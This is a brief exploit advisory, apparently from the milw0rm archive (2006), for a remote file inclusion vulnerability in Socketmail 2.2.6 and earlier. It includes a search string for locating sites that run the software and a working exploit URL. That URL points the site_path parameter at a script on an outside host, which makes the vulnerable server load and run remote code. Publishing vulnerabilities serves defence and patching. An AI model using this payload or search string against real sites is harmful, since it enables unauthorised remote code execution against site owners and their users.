Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: Creative Digital Resources URL: http://socketmail.com ----------------------------------------------------------------- Credits: Discovered by: 'Aesthetico' http://www.majorsecurity.de ----------------------------------------------------------------- Search for: "Powered by SocketMail" ----------------------------------------------------------------- Exploitation(tested with Lite-Edition and Pro-Edition): /index.php?site_path=http://www.yourspace.com/yourscript.php? # milw0rm.com [2006-05-25]